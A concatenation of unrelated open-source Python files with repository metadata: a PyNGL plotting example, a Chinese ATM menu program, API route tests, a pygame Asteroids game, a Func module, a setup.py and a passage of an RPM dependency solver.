res.lbLabelFontHeightF = 0.01 #-- labelbar label font size
res.mpFillOn = False #-- don't use filled map
res.mpGridAndLimbOn = False #-- don't draw grid lines
res.sfXArray = x #-- transform x to mesh scalar field
res.sfYArray = y #-- transform y to mesh scalar field
res.sfXCellBounds = vlon #-- needed if set cnFillMode = "CellFill"
res.sfYCellBounds = vlat #-- needed if set cnFillMode = "CellFill"
res.tiMainString = "Unstructured grid: ICON" #-- title string
res.tiMainOffsetYF = 0.03 #-- move main title towards plot
#-- create the plot
plot = Ngl.contour_map(wks,var,res)
#-- draw the plot and advance the frame
Ngl.draw(plot)
Ngl.frame(wks)
#-- get wallclock time
t2 = time.time()
print "Wallclock time: %0.3f seconds" % (t2-t1)
print ""
Ngl.end()
|
likev/ncl
|
ncl_ncarg_src/ni/src/examples/nug/NUG_unstructured_contour_cellfill_PyNGL.py
|
Python
|
gpl-2.0
| 5,242
|
#! /usr/bin/env python3
from publicAPI import auth_account, register_account, change_admin_password
from publicAPI import modify_admin_account_info, add_admin_account, delete_account, change_admin_permission
from config.settings import user_info
from publicAPI import register_account, for_super_admin_change_password, for_admin_unlock_account, for_admin_lock_account
from record_log import Logger
from publicAPI import change_user_credit_line, show_account_info, for_owner_change_password
from publicAPI import transfer_cash, search_history_log
from publicAPI import for_admin_withdraw_money
bank_log_file = "china_bank.log" # 银行基本日志
sold_log_file = "sold_bank.log" # 用户交易日志
def update_info(user_info_dict, file_path="./config/settings.py", name="user_info = "): # 接收一个字典字符串,然后写入到文件,把一个字典类型参数写入文件
import re
write_data = re.findall('["\'\[\]\w,:\s=\d@.\-]+\{*|\}', name + str(user_info_dict).replace("'", '"'))
count = 0
with open(file_path, 'w') as database:
for content in write_data:
if content.find('{') != -1:
database.write('%s%s\n' % (str(count * '\t').expandtabs(4), content))
count += 1
elif content.find('}') != -1:
database.write('%s%s\n' % (str(count * '\t').expandtabs(4), content))
count -= 1
else:
database.write('%s%s\n' % (str(count * '\t').expandtabs(4), content))
database.close()
return True
def atm_self_service(quit_atm_self_service=False): # ATM自助服务系统
while not quit_atm_self_service:
print("""欢迎使用 中国建都银行 自助服务系统
============================================
普通客户大众版平台(1) 银行前台专业版管理中心(2)
返回(b) 退出(q)
============================================
""")
wait_choose = str(input("请选择操作:")).strip()
if wait_choose == "1":
Logger(bank_log_file).write_log(status=True, event="进入普通客户大众版平台")
quit_atm_self_service = public_login(bank_log_file, quit_atm_self_service) # 进入大众版登陆系统
elif wait_choose == "2":
Logger(bank_log_file).write_log(user=None, status=True, event="进入银行前台管理页面")
quit_atm_self_service = admin_bank_system(bank_log_file, quit_atm_self_service) # 进入管理员操作平台
elif str(wait_choose).lower() in ['q', 'quit', ]:
quit_atm_self_service = True
print("谢谢使用,再见 !")
Logger(bank_log_file).write_log(status=True, event="退出")
break
elif str(wait_choose).lower() in ['b', 'back', ]:
break
else:
print("操作有误 !!!")
return quit_atm_self_service
def public_login(log_file, quit_public_login=False):
while not quit_public_login:
try:
user_database = user_info["user_bank"]
except KeyError:
user_info["user_bank"] = {}
user_database = user_info["user_bank"]
print("""欢迎进入 中国建都银行 用户中心
=========================================
用户登陆(1)
返回(b) 退出(q)
=========================================
""")
wait_choose = str(input("请选择操作:")).strip()
if wait_choose == "1":
get_user = auth_account(user_database, log_file=log_file)
if type(get_user) == dict: # 如果有数据返回,且不是True,则该账户被锁定,写入数据
user_info["user_bank"] = get_user
update_info(user_info)
elif get_user:
try:
user_status = user_info["user_bank"][get_user]["user_status"]
if user_status == "0": # 当登陆成功后,重置用户登陆错误状态
user_info["user_bank"][get_user]["user_status"] = "2"
update_info(user_info)
except KeyError:
pass
quit_public_login = public_user_system(get_user, quit_public_login, log_file)
elif str(wait_choose).lower() in ['q', 'quit', ]:
quit_public_login = True
print("谢谢使用,再见 !")
Logger(log_file).write_log(status=True, event="退出")
break
elif str(wait_choose).lower() in ['b', 'back', ]:
break
else:
print("操作有误 !!!")
return quit_public_login
def public_user_system(user, quit_user_system=False, log_file=None):
while not quit_user_system:
user_database = user_info["user_bank"]
print("""欢迎使用 中国建都银行 用户[%s]已登陆
===============================================
个人信息(1) 修改密码(2)
转账(3) 取现(4) 还款(5)
交易记录(6) 操作日志(7)
账单查询(8)
注销(b) 退出(q)
===============================================
""" % user)
wait_choose = str(input("请选择操作:")).strip()
if wait_choose == "1":
show_account_info(user_database, user, is_admin=False, log_file=log_file)
elif wait_choose == "2":
get_database = for_owner_change_password(user_database, user, log_file=log_file)
if type(get_database) == dict:
user_info["user_bank"] = get_database
update_info(user_info)
elif wait_choose == "3":
get_database = transfer_cash(user_database, user, log_file=log_file, sold_log=sold_log_file)
if type(get_database) == dict:
user_info["user_bank"] = get_database
update_info(user_info)
elif wait_choose == "4":
get_database = for_admin_withdraw_money(user_database, user, log_file=log_file, sold_log= sold_log_file)
if type(get_database) == dict:
user_info["user_bank"] = get_database
update_info(user_info)
elif wait_choose == "6":
search_history_log(user, log_file=log_file, sold_log=sold_log_file, is_sold=True)
elif wait_choose == "7":
search_history_log(user, log_file=log_file)
elif str(wait_choose).lower() in ['q', 'quit', ]:
quit_user_system = True
print("谢谢使用,再见 !")
Logger(log_file).write_log(user=user, status=True, event="退出")
break
elif str(wait_choose).lower() in ['b', 'back', ]:
break
else:
print("操作有误 !!!")
return quit_user_system
def admin_bank_system(log_file, quit_admin_bank=False): # 银行管理人员操作平台
while not quit_admin_bank:
open_register = "首次注册(2)"
try:
admin_database = user_info['admin_bank']
except KeyError:
user_info['admin_bank'] = {}
admin_database = user_info['admin_bank']
if len(admin_database) > 0:
open_register = False # 如果系统存在管理员帐号,则不开放这个功能,后续增加管理员帐号只能登陆后添加
open_login = "管理员登录(1)"
else:
open_login, open_register = open_register, True
print("""欢迎进入 中国建都银行 管理平台
============================================
%s
返回(b) 退出(q)
============================================
""" % open_login)
wait_choose = str(input("请选择操作:")).strip()
if wait_choose == "1" and not open_register:
get_admin = auth_account(admin_database, is_admin=True, log_file=log_file) # 调用登陆模块
if get_admin:
quit_admin_bank = admin_management(get_admin, quit_admin_bank, log_file=log_file) # 进入管理员操作中心
elif wait_choose == "2" and open_register: # 只有数据库没有任何用户的情况才会开放这个注册功能
get_database = register_account(admin_database, is_admin=True, log_file=log_file) # 调用注册模块
if get_database:
user_info['admin_bank'] = get_database # 更新数据库信息
update_info(user_info) # 写入数据库
elif str(wait_choose).lower() in ['q', 'quit', ]:
quit_admin_bank = True
print("谢谢使用,再见 !")
Logger(log_file).write_log(status=True, event="退出")
break
elif str(wait_choose).lower() in ['b', 'back', ]:
break
else:
print("操作有误 !!!")
return quit_admin_bank
def admin_management(admin_name, quit_admin_management=False, log_file=None): # 管理员登陆成功后的账号操作
while not quit_admin_management:
try:
user_database = user_info["user_bank"]
except KeyError:
user_info["user_bank"] = {}
user_database = user_info["user_bank"]
if not user_info["admin_bank"].get(admin_name):
break
print("""中国建都银行 管理中心 [%s]已登陆
===========================================
开户(1) 修改密码(2) 查询账户(s)
存钱(3) 取钱(4)
额度(5) 解锁(6)
挂失(7) 销户(8)
管理员帐户管理(9)
注销(b) 退出(q)
===========================================
""" % admin_name)
wait_choose = str(input("请选择操作:")).strip()
if wait_choose == "1":
get_database = register_account(user_database, log_file=log_file)
if type(get_database) == dict:
user_info["user_bank"] = get_database
update_info(user_info)
elif wait_choose == "2":
get_database = for_super_admin_change_password(user_database, admin_name, log_file=log_file)
if type(get_database) == dict:
user_info["user_bank"] = get_database
update_info(user_info)
elif wait_choose == "3":
print("该功能暂未开放")
elif wait_choose == "4":
print("该功能暂未开放")
elif wait_choose.lower() == "s":
show_account_info(user_database, admin_name, is_admin=True, log_file=log_file)
elif wait_choose == "5":
get_database = change_user_credit_line(user_database, admin_name, log_file=log_file)
if type(get_database) == dict:
user_info['user_bank'] = get_database # 更新数据库信息
update_info(user_info)
elif wait_choose == "6":
get_database = for_admin_unlock_account(user_database, admin_name, log_file=log_file)
if type(get_database) == dict:
user_info["user_bank"] = get_database
update_info(user_info)
elif wait_choose == "7":
get_database = for_admin_lock_account(user_database, admin_name, log_file=log_file)
if type(get_database) == dict:
user_info["user_bank"] = get_database
update_info(user_info)
elif wait_choose == "8":
get_database = delete_account(user_database, admin_name, is_admin=False, log_file=log_file)
if type(get_database) == dict:
user_info['user_bank'] = get_database # 更新数据库信息
update_info(user_info)
elif wait_choose == "9":
quit_admin_management = management_admin_account(
admin_name, quit_admin_management, log_file=log_file) # 对管理员账号进行操作
elif str(wait_choose).lower() in ['q', 'quit', ]:
quit_admin_management = True
Logger(log_file).write_log(user=admin_name, status=True, event="管理员退出")
print("谢谢使用,再见 !")
break
elif str(wait_choose).lower() in ['b', 'back', ]:
Logger(log_file).write_log(user=admin_name, status=True, event="管理员注销")
break
else:
print("操作有误 !!!")
return quit_admin_management
def management_admin_account(admin_name, quit_management_account, log_file=None):
while not quit_management_account:
admin_database = user_info['admin_bank']
if not admin_database.get(admin_name):
break
print("""中国建都银行 管理中心 [%s]已登陆
===========================================
添加管理账号(1)
删除管理账号(2)
更改账号权限(3)
更改账号信息(4)
修改管理员密码(5)
返回(b) 退出(q)
===========================================
""" % admin_name)
wait_choose = str(input("请选择操作:")).strip()
if wait_choose == "1":
get_database = add_admin_account(admin_database, admin_name, is_admin=True, log_file=log_file)
if type(get_database) == dict:
user_info['admin_bank'] = get_database # 更新数据库信息
update_info(user_info)
elif wait_choose == "2":
get_database = delete_account(admin_database, admin_name, is_admin=True, log_file=log_file)
if type(get_database) == dict:
user_info['admin_bank'] = get_database # 更新数据库信息
update_info(user_info)
elif wait_choose == "3":
get_database = change_admin_permission(admin_database, admin_name, log_file=log_file)
if type(get_database) == dict:
user_info['admin_bank'] = get_database # 更新数据库信息
update_info(user_info)
elif wait_choose == "4":
get_database = modify_admin_account_info(admin_database, admin_name, is_admin=True, log_file=log_file)
if type(get_database) == dict:
user_info['admin_bank'] = get_database # 更新数据库信息
update_info(user_info)
elif wait_choose == "5":
get_database = change_admin_password(admin_database, admin_name, log_file=log_file)
if type(get_database) == dict:
user_info['admin_bank'] = get_database # 更新数据库信息
update_info(user_info)
elif str(wait_choose).lower() in ['q', 'quit', ]:
quit_management_account = True
Logger(log_file).write_log(user=admin_name, status=True, event="管理员退出")
print("谢谢使用,再见 !")
break
elif str(wait_choose).lower() in ['b', 'back', ]:
break
else:
print("操作有误 !!!")
return quit_management_account
|
zengchunyun/s12
|
day5/ATM_mall/ATM/__init__.py
|
Python
|
gpl-2.0
| 14,978
|
from unittest import TestCase
from brainiak.handlers import ClassHandler, VersionHandler, \
HealthcheckHandler, VirtuosoStatusHandler, InstanceHandler, SuggestHandler, \
StoredQueryCollectionHandler, StoredQueryCRUDHandler, StoredQueryCRUDHandler, \
StoredQueryExecutionHandler
from brainiak.routes import ROUTES
class RouteTestCase(TestCase):
def test_healthcheck(self):
regex = self._regex_for(HealthcheckHandler)
HEALTCHECK_SUFFIX = '/healthcheck'
self.assertTrue(regex.match(HEALTCHECK_SUFFIX))
def test_version(self):
regex = self._regex_for(VersionHandler)
VERSION_SUFFIX = '/_version'
self.assertTrue(regex.match(VERSION_SUFFIX))
def test_status_virtuoso(self):
regex = self._regex_for(VirtuosoStatusHandler)
VIRTUOSO_STATUS = '/_status/virtuoso'
self.assertTrue(regex.match(VIRTUOSO_STATUS))
def test_range_search(self):
regex = self._regex_for(SuggestHandler)
VIRTUOSO_STATUS = '/_suggest'
self.assertTrue(regex.match(VIRTUOSO_STATUS))
def test_schema_resource(self):
regex = self._regex_for(ClassHandler)
VALID_SCHEMA_RESOURCE_SUFFIX = '/person/Gender/_schema'
match_pattern = regex.match(VALID_SCHEMA_RESOURCE_SUFFIX)
expected_params = {"context_name": "person", "class_name": "Gender"}
self.assertTrue(self._groups_match(match_pattern, expected_params))
def test_invalid_schema_resource(self):
regex = self._regex_for(ClassHandler)
INVALID_SCHEMA_RESOURCE_SUFFIX = '/person/Gender/'
match_pattern = regex.match(INVALID_SCHEMA_RESOURCE_SUFFIX)
self.assertFalse(self._groups_match(match_pattern, {}))
def test_invalid_schema_resource_with_unexpected_params(self):
regex = self._regex_for(ClassHandler)
VALID_SCHEMA_RESOURCE_SUFFIX = '/person/Gender/_schema'
match_pattern = regex.match(VALID_SCHEMA_RESOURCE_SUFFIX)
unexpected_params = {"context_name": "person",
"class_name": "Gender",
"unexpected_param": "param"}
self.assertFalse(self._groups_match(match_pattern, unexpected_params))
def test_invalid_schema_resource_nonexistent_suffix(self):
regex = self._regex_for(ClassHandler)
INVALID_SCHEMA_RESOURCE_SUFFIX = '/person/Gender/_class_schema'
match_pattern = regex.match(INVALID_SCHEMA_RESOURCE_SUFFIX)
unexpected_params = {"context_name": "person", "class_name": "Gender"}
self.assertFalse(self._groups_match(match_pattern, unexpected_params))
def test_instance_resource(self):
regex = self._regex_for(InstanceHandler)
VALID_INSTANCE_RESOURCE_SUFFIX = "/person/Gender/Male"
match_pattern = regex.match(VALID_INSTANCE_RESOURCE_SUFFIX)
expected_params = {"context_name": "person",
"class_name": "Gender",
"instance_id": "Male"}
self.assertTrue(self._groups_match(match_pattern, expected_params))
def test_instance_resource_nonexistent_params(self):
regex = self._regex_for(InstanceHandler)
VALID_INSTANCE_RESOURCE_SUFFIX = "/person/Gender/Male"
match_pattern = regex.match(VALID_INSTANCE_RESOURCE_SUFFIX)
expected_params = {"context_name": "person",
"class_name": "Gender",
"crazy_parameter": "crazy_value"}
self.assertFalse(self._groups_match(match_pattern, expected_params))
def test_stored_query_route_list_all(self):
regex = self._regex_for(StoredQueryCollectionHandler)
VALID_STORED_QUERY_COLLECTION_SUFFIX = "/_query"
match = regex.match(VALID_STORED_QUERY_COLLECTION_SUFFIX)
self.assertTrue(match is not None)
def test_stored_query_route_crud(self):
regex = self._regex_for(StoredQueryCRUDHandler)
VALID_STORED_QUERY_CRUD_SUFFIX = "/_query/query_id"
match_pattern = regex.match(VALID_STORED_QUERY_CRUD_SUFFIX)
expected_params = {"query_id": "query_id"}
self.assertTrue(self._groups_match(match_pattern, expected_params))
def test_stored_query_route_execution(self):
regex = self._regex_for(StoredQueryExecutionHandler)
VALID_INSTANCE_RESOURCE_SUFFIX = "/_query/query_id/_result"
match_pattern = regex.match(VALID_INSTANCE_RESOURCE_SUFFIX)
expected_params = {"query_id": "query_id"}
self.assertTrue(self._groups_match(match_pattern, expected_params))
def _regex_for(self, klass):
return filter(lambda u: u.handler_class == klass, ROUTES)[0].regex
def _groups_match(self, match, groups):
if match is None or len(groups) == 0:
return False
for group in groups.keys():
try:
if not match.group(group) == groups[group]:
return False
except IndexError:
return False
return True
|
bmentges/brainiak_api
|
tests/unit/test_routes.py
|
Python
|
gpl-2.0
| 5,018
|
import asteroid
import math
import pygame
from pygame.locals import *
import random
import ship
import sys
'''Pygame constants'''
SCR_WIDTH, SCR_HEIGHT = 640, 480
FPS = 30
'''Misc stff'''
starfield = []
NUM_STARS = 45
asteroids = []
NUM_ASTEROIDS = 3
'''Pygame init'''
pygame.init()
fps_timer = pygame.time.Clock()
screen = pygame.display.set_mode((SCR_WIDTH, SCR_HEIGHT))
player = ship.Ship(SCR_WIDTH, SCR_HEIGHT)
def init_starfield():
global starfield
for i in range(NUM_STARS):
x = random.random() * SCR_WIDTH
y = random.random() * SCR_HEIGHT
starfield.insert(i, (x,y))
init_starfield()
def init_asteroids():
for i in range(NUM_ASTEROIDS):
asteroids.append(asteroid.Asteroid(SCR_WIDTH, SCR_HEIGHT))
init_asteroids()
first_pass = True
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
if event.type == KEYDOWN:
if event.key == K_RIGHT or event.key == K_d:
player.rotate_right = True
elif event.key == K_LEFT or event.key == K_a:
player.rotate_left = True
if event.key == K_UP or event.key == K_w:
player.thrusting = True
if event.key == K_SPACE:
player.fire = True
if event.type == KEYUP:
if event.key == K_RIGHT or event.key == K_d:
player.rotate_right = False
if event.key == K_LEFT or event.key == K_a:
player.rotate_left = False
if event.key == K_UP or event.key == K_w:
player.thrusting = False
if event.key == K_SPACE:
player.fire = False
if player.rotate_right:
player.angle += player.ROTATE_SPEED
elif player.rotate_left:
player.angle -= player.ROTATE_SPEED
if player.thrusting:
vel = player.thrust(player.angle)
player.xvel += vel[0]
player.yvel += vel[1]
if math.fabs(player.xvel) > player.MAX_VEL:
player.xvel = math.copysign(player.MAX_VEL, player.xvel)
if math.fabs(player.yvel) > player.MAX_VEL:
player.yvel = math.copysign(player.MAX_VEL, player.yvel)
else:
if math.fabs(player.xvel) > 0.0:
player.xvel += -(math.copysign(player.FRICTION, player.xvel))
else:
player.xvel = 0.0
if math.fabs(player.yvel) > 0.0:
player.yvel += -(math.copysign(player.FRICTION, player.yvel))
else:
player.yvel = 0.0
if player.fire:
player.fire_bullet(player.angle, player.points[0][0], player.points[0][1])
player.fire = False
if len(player.bullets) > 0:
player.update_bullets()
player.rotate(player.centx, player.centy)
player.trans()
player.centx += player.xvel
player.centy += player.yvel
centroid = player.wrap()
player.centx = centroid[0]
player.centy = centroid[1]
# print('xvel = ' + str(xvel) + ', yvel = ' + str(yvel) + ', angle = ' + str(angle))
screen.fill((32,32,32))
for star in starfield:
pygame.draw.rect(screen, (255,255,255), (star[0], star[1], 2, 2))
for bullet in player.bullets:
pygame.draw.rect(screen, (255, 255, 0), (bullet[1], bullet[2], 2, 2))
for each_asteroid in asteroids:
each_asteroid.move()
each_asteroid.render(screen)
player.render(screen)
pygame.display.flip()
fps_timer.tick(FPS)
|
vitriolik/Asteroids2
|
asteroids.py
|
Python
|
gpl-2.0
| 3,039
|
# Copyright 2008, Red Hat, Inc
# Steve Salevan <ssalevan@redhat.com>
#
# This software may be freely redistributed under the terms of the GNU
# general public license.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
import func_module
import func.overlord.client as fc
from certmaster import certmaster as certmaster
from func import utils
class OverlordModule(func_module.FuncModule):
version = "0.0.1"
api_version = "0.0.1"
description = "Module for controlling minions that are also overlords."
def map_minions(self,get_only_alive=False):
"""
Builds a recursive map of the minions currently assigned to this
overlord
"""
maphash = {}
current_minions = []
if get_only_alive:
ping_results = fc.Overlord("*").test.ping()
for minion in ping_results.keys():
if ping_results[minion] == 1: #if minion is alive
current_minions.append(minion) #add it to the list of current minions
else:
cm = certmaster.CertMaster()
current_minions = cm.get_signed_certs()
for current_minion in current_minions:
maphash[current_minion] = fc.Overlord(current_minion).overlord.map_minions()[current_minion]
return maphash
|
pombredanne/func
|
func/minion/modules/overlord.py
|
Python
|
gpl-2.0
| 1,452
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Setup Script for Speak
You can install Speak with
python setup.py install
"""
import os
import re
import sys
from setuptools import find_packages, setup
if sys.argv[-1] == 'setup.py':
print("To install, run 'python setup.py install'")
print()
if sys.version_info[:2] < (3, 3):
print("Speak requires Python 3.3 or later (%d.%d detected)." %
sys.version_info[:2])
sys.exit(-1)
with open(os.path.join("speak", "__init__.py"), "r") as f:
version = re.search("__version__ = \"([^\"]+)\"", f.read()).group(1)
try:
import pypandoc
readme = pypandoc.convert("README.md", "rst")
except ImportError:
with open("README.md", "r") as f:
readme = f.read()
classifiers = ["Development Status :: 3 - Alpha",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: End Users/Desktop",
"License :: OSI Approved :: GNU General Public License v3 (GPLv3)",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Topic :: Multimedia :: Sound/Audio :: Sound Synthesis",
"Topic :: Multimedia :: Sound/Audio :: Speech",
"Topic :: Utilities"]
requirements = ['requests>=2.3.0,<2.6.0']
setup(name="speak",
version=version,
author="jamalsenouci",
packages=find_packages(),
entry_points={"console_scripts": ["speak = speak:cl_main"]},
install_requires=requirements,
description="Read text using Google voice tts service",
long_description=readme,
license='LICENSE.txt',
url="https://github.com/jamalsenouci/speak",
download_url="https://github.com/jamalsenouci/speak/archive/%s.tar.gz" % (version),
keywords=["speech", "audio", "synthesis", "voice", "google"],
classifiers=classifiers,
test_suite='nose.collector',
tests_require=['nose>=0.10.1'])
|
jamalsenouci/speak
|
setup.py
|
Python
|
gpl-2.0
| 2,219
|
#! /usr/bin/env python
# rpm_solver.py
# Given a pile of RPMs will check dependency closure, will attempt to figure out
# their installation order.
#
# Copyright 2005 Progeny Linux Systems, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Author: Sam Hart
import os
import fnmatch
import getopt
import sys
import getopt
import rpm
import traceback
import commands
import tempfile
class progress_bar:
def __init__(self, prefix="Progress :", prog_char="-", col=60, outnode=sys.stdout):
self.f = outnode
self.prog_char = prog_char
self.col = col
self.spinner = ["|", "/", "-", "\\"]
self.spin_count = 0
self.prefix = prefix
def set(self, prefix="Progress :"):
self.prefix = prefix
def clear(self):
self.f.write("\r")
for i in range(0, self.col):
self.f.write(" ")
self.f.write("\r")
self.f.flush()
def progress(self, percentage):
"""Count must be out of 100%"""
if percentage > 1.0:
percentage = 1.0
self.f.write(("\r%s 0 |") % self.prefix)
width = self.col - len(("\r%s 0 100 |") % self.prefix) + 1
count = width * percentage
i = 1
while i < count:
self.f.write(self.prog_char)
i = i + 1
if count < width:
self.f.write(">")
while i < width:
self.f.write(" ")
i = i + 1
if self.spin_count >= len(self.spinner):
self.spin_count = 0
self.f.write(self.spinner[self.spin_count])
self.spin_count = self.spin_count + 1
self.f.write(" 100 ")
self.f.flush()
class rpm_solver:
def __init__(self, progress=0, verbose=0):
self.progress = progress
self.verbose = verbose
self._initdb = 0
col = commands.getoutput("echo \"$COLUMNS\"")
try:
columns = int(col)
except:
columns = 60
self.pb = progress_bar("rpm_solver :", "-", columns, sys.stderr)
def init_db(self, rpm_dir, avail_dir=None, recursive=0, work_dir=tempfile.mkdtemp()):
""" Init the database """
self.solver_db = self.db(rpm_dir, recursive, work_dir)
self.solver_db.populate_db(self.verbose, self.pb, 1, self.progress)
self.use_avail = 0
self._initdb = 1
if avail_dir:
self.avail_db = self.db(avail_dir, recursive)
self.avail_db.populate_db(self.verbose, self.pb, 0, self.progress)
self.use_avail = 1
def add(self, file):
""" Add a new file to the solver db """
self.solver_db.add(self.avail_db.rpm_filenames[file])
def what_provides(self, solver_db, name, version=None):
""" Given a name and a version, see what provides it """
for hdr_key in solver_db.rpmdb.keys():
provides = solver_db.rpmdb[hdr_key][rpm.RPMTAG_PROVIDES]
if name in provides:
if version:
version_check = solver_db.rpmdb[hdr_key][rpm.RPMTAG_VERSION]
if version == version_check:
return hdr_key
else:
return hdr_key
file_list = solver_db.rpmdb[hdr_key][rpm.RPMTAG_FILENAMES]
if name in file_list:
return hdr_key
return None
def dep_closure(self):
""" Determine if they have dependency closure """
needed = []
problems = []
if self._initdb:
missing_deps = self.solver_db.ts.check()
if self.verbose > 1:
print "->Result of solver_db.ts.check():"
print missing_deps
if len(missing_deps):
for dep in missing_deps:
# XXX FIXME
# Okay, we completely ignore the version here, which is
# wrong wrong WRONG! We should be smacked.
if self.use_avail:
package = self.what_provides(self.avail_db, dep[1][0], dep[1][1])
if package and (not package in needed):
needed.append(package)
else:
problems.append("%s needs %s" % (dep[0][0], dep[1][0]))
else:
package = self.what_provides(self.solver_db, dep[1][0])
if package and (not package in needed):
needed.append(package)
else:
problems.append("%s needs %s" % (dep[0][0], dep[1][0]))
else:
problems.append("Database has not been populated")
return needed, problems
def _get_filename_from_hdr(self, pkg_te):
""" Given a package name, find the filename for it """
pkg = pkg_te.N()
for name in self.solver_db.rpmdb.keys():
if pkg == self.solver_db.rpmdb[name][rpm.RPMTAG_NAME]:
return name
return None
def order_solver(self, fullname=1):
""" Once the database has been populated, try to solve the order """
order_pkg = []
order_filename = []
self.solver_db.ts.order()
while 1:
try:
order_pkg.append(self.solver_db.ts.next())
except:
break
for pkg in order_pkg:
if fullname:
order_filename.append(self._get_filename_from_hdr(pkg))
else:
order_filename.append(pkg.N())
return order_filename
class db:
def __init__(self, rpm_dir=".", recurse=1, work_dir=tempfile.mkdtemp(), ext="*.rpm"):
self.rpm_dir = rpm_dir
self.recurse = recurse
self.rpmdb = {}
self.ext = ext
self.tmp_dir = work_dir
self.ts = rpm.TransactionSet(self.tmp_dir)
self.ts.setVSFlags(rpm._RPMVSF_NOSIGNATURES)
def close(self):
self.ts.closeDB()
for root, dirs, files in os.walk(self.tmp_dir, topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
def get_rpmdb_size(self):
return len(self.rpmdb)
def populate_db(self, verbose, pb, pop_trans=1, progress=0):
""" Populate our own DB :-)"""
self.rpm_filenames = self._list_files()
i = 0.0
if progress:
pb.set("Populate RPMDB :")
for name in self.rpm_filenames.keys():
filename = self.rpm_filenames[name]
if verbose: print "rpm_solver.db.populate_db : Adding " + str(filename)
if progress:
i = i + 1.0
percent = i / len(self.rpm_filenames)
pb.progress(percent)
self.add(filename, pop_trans)
if progress:
pb.clear()
if verbose > 1:
print ("->The contents of this transaction set for %s:" % self.rpm_dir)
for tx in self.ts:
print tx
def add(self, filename, pop_trans=1):
if filename.startswith("http://"):
# XXX FIXME:
# Okay, I give up about doing this nicely. Screw it.
tmpfile = tempfile.mktemp()
problem = 0
while 1:
output = commands.getoutput("wget -O %s %s" % (tmpfile, filename))
try:
fdno = os.open(tmpfile, os.O_RDONLY)
os.close(fdno)
break
except:
if problem > 10:
print "FATAL ERROR!"
print "Could not download " + filename
sys.exit(2)
else:
problem = problem + 1
localfile = tmpfile
else:
localfile = filename
try:
fname = filename.split("/")[-1]
except:
fname = filename
fdno = os.open(localfile, os.O_RDONLY)
hdr = self.ts.hdrFromFdno(fdno)
os.close(fdno)
self.rpmdb[fname] = hdr
if pop_trans:
self.ts.addInstall(hdr,None)
if filename.startswith("http://"):
os.unlink(tmpfile)
def _list_files(self):
"""List all the files in a directory"""
root = self.rpm_dir
patterns = self.ext
recurse = self.recurse
return_folders = 0
if root.startswith("http://"):
output = commands.getoutput("links -dump %s | grep \"http://\" | grep \".rpm\" | awk '{print $2}'" % root)
results = output.split("\n")
return results
else:
# Expand patterns from semicolon-separated string to list
pattern_list = patterns.split(';')
class Bunch:
def __init__(self, **kwds): self.__dict__.update(kwds)
arg = Bunch(recurse=recurse, pattern_list=pattern_list, return_folders=return_folders, results={})
def visit(arg, dirname, files):
# Append to arg.results all relevant files
for name in files:
fullname = os.path.normpath(os.path.join(dirname, name))
fullname = fullname.rstrip()
if arg.return_folders or os.path.isfile(fullname):
for pattern in arg.pattern_list:
if fnmatch.fnmatch(name, pattern):
arg.results[name] = fullname
break
# Block recursion if disallowed
if not arg.recurse: files[:]=[]
os.path.walk(root, visit, arg)
return arg.results
def process(rpm_dir, solve_dir, yes_solve, check_only, recursive, progress, verbose, pdk_output, work_dir):
""" Main process if ran from command line """
solver = rpm_solver(progress, verbose)
solver.init_db(rpm_dir, solve_dir, recursive, work_dir)
needed, problems = solver.dep_closure()
solver_steps = []
while len(needed):
print "Error! The following packages are needed for dependency closure:\n"
for pkg in needed:
print "\t" + str(pkg)
if yes_solve or (raw_input("Solve for dependency? (y/N): ") in ("y", "yes", "Y")):
for pkg in needed:
from_file = solver.avail_db.rpm_filenames[pkg]
solver_steps.append("cp -f %s %s" %(from_file, rpm_dir))
solver.add(pkg)
needed, problems = solver.dep_closure()
else:
break
if len(solver_steps):
for line in solver_steps:
print line
if len(problems):
print "Error! The following problems were encountered:\n"
for pkg in problems:
print "\t" + str(pkg)
if len(problems) or len(needed):
sys.exit(2)
elif check_only:
print ("The RPMs in %s have dependency closure" % rpm_dir)
else:
# Okay we do stuff
if pdk_output:
ordered = solver.order_solver(0)
else:
ordered = solver.order_solver(1)
i = 0
for name in ordered:
if pdk_output:
print ("<rpm><name>%s</name><meta><pass>%d</pass></meta></rpm>" % (name, i))
else:
print ("%d:%s" % (i, name))
i = i + 1
def usage():
print "rpm_solver.py -"
print " Given a directory of RPMs, attempt to order their"
print "installation or determine if they have dependency closure."
print "\nUSAGE:"
print " rpm-solver.py [options] <RPM_DIR>"
print "\nWhere [options] may be one of the following:"
print "\t-c | --check\tCheck for dependency closure only"
print "\t-s | --solve\tUse the pool of rpms specified for solving"
print "\t-y | --yes\tAssume 'y' when -s can solve for dependency"
print "\t-v | --verbose\tBe verbose in processing"
print "\t-p | --progress\tUse progress bar"
print "\t-r | --recursive\tScan RPM_DIR recursively"
print "\t-k | --pdk\t\tProduce PDK ready XML snippits"
print "\t-w | --work\t\tSupply a work dir (typically chroot) for rpmdb"
print "\n\n"
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "vprs:cuykw:", ["verbose", "progress", "recursive", "solve=", "check", "yes", "pdk", "work="])
except getopt.GetoptError:
# print help information and exit:
usage()
sys.exit(2)
verbose = 0
progress = 0
recursive = 0
solve_dir = None
check_only = 0
yes_solve = 0
pdk_output = 0
work_dir = tempfile.mkdtemp()
if len(sys.argv) < 2:
usage()
sys.exit(2)
rpm_dir = sys.argv[-1]
for o, a in opts:
if o in ("-v", "--verbose"):
verbose = verbose + 1
if o in ("-p", "--progress"):
progress = 1
